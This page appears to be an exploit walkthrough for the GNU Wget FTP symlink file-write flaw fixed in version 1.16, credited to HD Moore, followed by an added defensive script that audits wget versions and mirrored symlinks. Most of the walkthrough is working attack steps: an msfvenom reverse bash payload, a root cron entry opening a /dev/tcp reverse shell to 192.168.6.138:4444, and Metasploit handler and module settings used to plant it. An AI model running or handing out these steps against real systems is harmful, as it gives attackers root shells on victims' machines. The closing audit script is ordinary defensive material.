Timeline :
Vulnerability discovered by hdm on 2014-08-24
Vendor notified on 2014-08-24
Patched by the vendor on 2014-09-01
Advisory released on 2014-10-27
Metasploit PoC provided on 2014-10-27
PoC provided by :
HD Moore of Rapid7
Reference(s) :
Affected version(s) :
All GNU Wget before version 1.16
Tested on :
Ubuntu Server 12.10 with GNU Wget version 1.13.4, run as the root user
Description :
This module exploits a vulnerability in Wget when used in recursive (-r) mode with an FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the “file:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.
Commands :
1. Create a reverse bash payload

    msfvenom -p cmd/unix/reverse_bash -f raw LHOST=192.168.6.138

2. Create a crontab file that runs once a minute and launches the command below

    cat>cronshell <<EOD
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    * * * * * root bash -c '0<&148-;exec 148<>/dev/tcp/192.168.6.138/4444;sh <&148 >&148 2>&148'; rm -f /etc/cron.d/cronshell
    EOD

3. Run a shell listener in Metasploit

    use exploit/multi/handler
    set PAYLOAD cmd/unix/reverse_bash
    set LHOST 192.168.6.138
    run -j

4. Run the wget_symlink_file_write Metasploit module

    use auxiliary/server/wget_symlink_file_write
    set SRVHOST 192.168.6.138
    set TARGET_FILE /etc/cron.d/cronshell
    set TARGET_DATA file:/root/cronshell
    set SRVPORT 21
    run

5. On the victim machine, execute the command below

    wget -m ftp://192.168.6.138:21/

6. Get the Metasploit session

    sessions -i 1
    id
    uname -a
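
A defender-side check for the issue described above, as an added example that is not part of the original page or the Metasploit module: it reports whether a wget version string predates 1.16 and lists symlinks in a mirrored directory that resolve outside it. The function names are hypothetical, and it assumes the symlink the description mentions is still present in the download directory.

```shell
#!/bin/sh
# Added example (not from the original page): post-mirror audit for the
# symlink file write described above. Function names are hypothetical.

# Succeeds (exit 0) when version string $1 is older than 1.16, the first
# release this page lists as not affected.
wget_is_vulnerable() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    minor=${minor%%[!0-9]*}          # drop suffixes such as "16-beta"
    [ "$major" -lt 1 ] || { [ "$major" -eq 1 ] && [ "${minor:-0}" -lt 16 ]; }
}

# Prints "link -> resolved target" for every symlink under directory $1
# whose target resolves outside that directory.
# Assumption: file names contain no newlines.
escaping_symlinks() {
    root=$(cd "$1" && pwd -P) || return 2
    find "$root" -type l | while IFS= read -r link; do
        # readlink -f canonicalizes; fall back to the raw target if it cannot
        target=$(readlink -f -- "$link" 2>/dev/null) || target=$(readlink -- "$link")
        case "$target" in
            "$root"|"$root"/*) ;;                        # stays inside the mirror
            *) printf '%s -> %s\n' "$link" "$target" ;;  # escapes the mirror
        esac
    done
}

# Usage: sh audit.sh MIRROR_DIR
if [ $# -ge 1 ]; then
    if command -v wget >/dev/null 2>&1; then
        v=$(wget --version | head -n 1 | awk '{print $3}')
        if wget_is_vulnerable "$v"; then
            echo "installed wget $v predates 1.16"
        fi
    fi
    escaping_symlinks "$1"
fi
```

Any line printed by escaping_symlinks for a directory populated by `wget -r` or `wget -m` from an FTP server is worth reviewing together with the modification times of the resolved target.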